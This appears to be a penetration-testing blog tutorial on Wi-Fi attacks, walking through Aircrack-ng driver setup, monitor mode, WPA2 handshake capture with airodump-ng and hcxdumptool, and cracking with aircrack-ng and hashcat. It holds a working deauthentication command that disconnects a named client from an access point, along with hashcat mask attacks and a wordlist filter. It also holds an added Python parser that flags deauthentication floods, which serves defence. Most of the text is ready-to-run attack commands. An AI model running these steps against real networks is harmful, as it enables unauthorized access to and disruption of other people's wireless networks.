
Bread and Butter Wifi Attacks and Hash Cracking


Wi-Fi cracking is a fundamental skill. We’re looking at the Aircrack-ng suite, alongside the other tools that shaped the state of the art in WPA2 hash capturing and cracking.

Aircrack-ng Setup

We’re gonna work with root permissions most of the time.

```bash
$ sudo -i
```

For those using the RTL8812AU chipset, installing the driver is straightforward.

```bash
$ git clone -b v5.6.4.2 https://github.com/aircrack-ng/rtl8812au.git
$ cd rtl8812au
$ make install
```

Managing Drivers

Removing and reinstalling network drivers can often resolve issues with device compatibility.

```bash
$ dpkg -r realtek-rtl88xxau-dkms
$ dpkg -r realtek-rtl8814au-dkms
```

Repo Drivers

Be careful when going with drivers from the repos; most of the time you’ll end up in more trouble than with the vendor driver above.

```bash
$ apt install realtek-rtl88xxau-dkms
$ apt install btscanner aircrack-ng kismet
$ pip3 install kismet_rest deepdiff
```

Device Configuration

Before launching any attacks, confirm that your network devices are properly recognized and configured:

```bash
$ dmesg | grep 88xx
$ iwconfig
```

More useful commands

```bash
$ lsmod
$ blkid
$ lsblk
$ lsusb
```

Process Management

We noticed a better success rate when killing the interfering processes like this instead of the airmon-ng way; this might be system or adapter specific.

```bash
# the supplicant binary is wpa_supplicant (underscore), not wpa-supplicant
$ killall wpa_supplicant NetworkManager
```

Alternatively, you can use airmon-ng to manage interfering processes.

```bash
$ airmon-ng check kill
```

Initiating Monitor Mode

Monitor mode is essential for capturing packets.

```bash
$ airmon-ng start wlan0 wlan1
```

Dumping Hashes

Kismet

Kismet allows for detailed network scanning using multiple adapters.

```bash
$ kismet -c wlan0 -c wlan1
```

airodump-ng

The de facto standard still works great, even though more sophisticated tools are available today.

```bash
# -w (--write) sets the dump file prefix; airodump-ng accepts a comma-separated interface list
$ airodump-ng -w dump01 wlan0,wlan1 --output-format pcap
```

More useful params

```bash
--essid MyWifiAP                        # filter APs by ESSID
--bssid ...                             # filter APs by BSSID
-b abg                                  # bands to hop: a = 5 GHz, bg = 2.4 GHz
-c 1                                    # lock to channel 1 instead of hopping
--essid-regex ".*Vag\|VAG\|vag{1}.*"     # filter ESSIDs by regular expression
--essid "CIA Surveillance Van"          # quote ESSIDs that contain spaces
-t OPN                                  # filter by encryption (same as --encrypt)
```

hc-tools

hcxdumptool

For more targeted attacks, tools like hcxdumptool are useful for capturing newer types of hashes. However, PMKID usage is rare, so you might not get what you expect. We found little to no noticeable advantage when dumping directly with the hcx tools over using airodump-ng; this may of course be region or target dependent.

We’re still very happy about the development of hcx tools as well as overall progress in Wifi dumping / cracking tools.

```bash
$ hcxdumptool -i wlan0 -o dump02.pcapng
```

Converting capture files

Convert the capture files for processing with hashcat:

```bash
$ apt install hcxtools
$ hcxpcapngtool -o pcapng_hashes *.cap
```

Deauthentication Attacks

A simple deauthentication attack can disconnect clients from their access points:

```bash
$ aireplay-ng --deauth 200 -a BA:A2:34:22:E7:68 -c 6D:A7:EC:3A:47:58 wlan0
```

Cracking Hashes

Using Aircrack-ng for local cracking is straightforward but can be slow:

aircrack-ng

```bash
$ aircrack-ng dump.pcap -w wordlist.txt
```

Hashcat

```bash
$ .\hashcat.exe -m 22000 -d 2 -a 6 -i --increment-min=3 -1 ?l?d -2 ?u?l?d hashes.pcapng rockyou.txt ?2?1?1?1?s?s
$ .\hashcat.exe -m 22000 -d 2 -a 6 -i -1 "?l?d!_-+*$" hashes.pcapng wpa2_ultimate.txt ?1?1?1?1
```

Display SSIDs

We made a little bin tool to display SSIDs from hashdump files:
https://github.com/Network-Sec/bin-tools-pub/blob/main/hashdump_to_ssid.py

EAPOL

Capturing the complete 4-way handshake including EAPOL isn’t as important as hcxpcapngtool and some hashcat forum posts may make it sound. In certain scenarios airodump-ng still delivers, sometimes even faster and better than hcxdumptool.

The conversion works despite the tool complaining, and the resulting hashes are the same. The PMKID attack is of course a different story, but our finding is that many modern routers have been patched and are no longer vulnerable to it, while we can still capture WPA2 hashes the traditional way.

Tshark and Tcpdump

Don’t skip learning about Tshark and Tcpdump. They deliver much needed insight into how this works and also give you easy ways to do manually what hcxpcapngtool does, with custom options of your choosing.
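As an added example of doing the frame-level work by hand, and as the defender's counterpart to the deauthentication section above: a small 802.11 header parser that counts deauthentication frames per sender over a monitor-mode capture and flags the burst a deauth flood leaves behind. This is not code from the blog or from Aircrack-ng; the frames are constructed test input, bare 802.11 with the radiotap header already stripped, and the MAC addresses are the ones quoted in the post.

```python
# Added example, not from the blog or the Aircrack-ng project: a hand-rolled
# 802.11 header parser that counts deauthentication frames per sender, the check
# a defender runs over a monitor-mode capture to spot the burst that a deauth
# flood such as `aireplay-ng --deauth` leaves behind. Frames are bare 802.11
# (radiotap header already stripped), as tshark/tcpdump would hand them over.
import struct
from collections import Counter

DEAUTH = (0, 12)  # frame type 0 = management, subtype 12 = deauthentication

def mac(b: bytes) -> str:
    return ":".join(f"{x:02x}" for x in b)

def parse_deauth(frame: bytes):
    """Return (dst, src, bssid, reason) for a deauth frame, else None."""
    if len(frame) < 24:            # minimum management header length
        return None
    fc0 = frame[0]                 # first byte of the frame control field
    ftype, subtype = (fc0 >> 2) & 0x3, fc0 >> 4
    if (ftype, subtype) != DEAUTH:
        return None
    dst, src, bssid = frame[4:10], frame[10:16], frame[16:22]
    # Body is a 2-byte little-endian reason code; tolerate a truncated frame.
    reason = struct.unpack("<H", frame[24:26])[0] if len(frame) >= 26 else None
    return mac(dst), mac(src), mac(bssid), reason

def deauth_report(frames, threshold=10):
    """Count deauth frames per (src, bssid); return counts and flagged senders."""
    counts = Counter()
    for f in frames:
        parsed = parse_deauth(f)
        if parsed:
            counts[(parsed[1], parsed[2])] += 1
    flagged = [key for key, n in counts.items() if n >= threshold]
    return dict(counts), flagged

def _frame(fc0: int, dst: bytes, src: bytes, bssid: bytes, body: bytes = b"") -> bytes:
    """Constructed test frame: FC(2) + duration(2) + addr1..3 + seq ctrl(2) + body."""
    return bytes([fc0, 0x00]) + b"\x00\x00" + dst + src + bssid + b"\x00\x00" + body

# Constructed capture: 200 deauths carrying the AP address from the post, plus
# one beacon (subtype 8) that must not be counted; reason code 7 chosen arbitrarily.
AP, STA = bytes.fromhex("baa23422e768"), bytes.fromhex("6da7ec3a4758")
SAMPLE = [_frame(0xC0, STA, AP, AP, b"\x07\x00")] * 200 + [_frame(0x80, b"\xff" * 6, AP, AP)]
```

`deauth_report(SAMPLE)` returns the per-sender counts and the one flagged (src, bssid) pair; on a real capture, compare the flagged sender against the BSSID and look for a source that is not the legitimate AP.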

Wordlists

Wordlists specific to Wi-Fi: we created a couple of Wordlist Generator helper tools, which you can find in our GitHub:
https://github.com/Network-Sec/Wordlists

More Wordlist resources:

Important: we get a massive speed and success rate gain if we exclude words shorter than 8 characters, since 8 is the minimum passphrase length for WPA2.

```bash
$ cat rockyou.txt | grep --binary-files=text -Pe "^[\w\d\s]{8,32}$" | sort -u > wifi_rockyou.txt
```

Next Up

We’ll follow up with a dedicated article about Hash Cracking Strategies, an applied field manual of modern techniques that help you tackle hashes which are more difficult than top-10000-wordlist passwords or 7 random chars.

Conclusion

“Welcome to the 21st Century. Where sex is free, but love is expensive. Where Pizza arrives faster than an Ambulance and a Smartphone is more important than dignity.”

“Welcome to the darkness, where lying is modern, treason is smart and poverty a flaw.”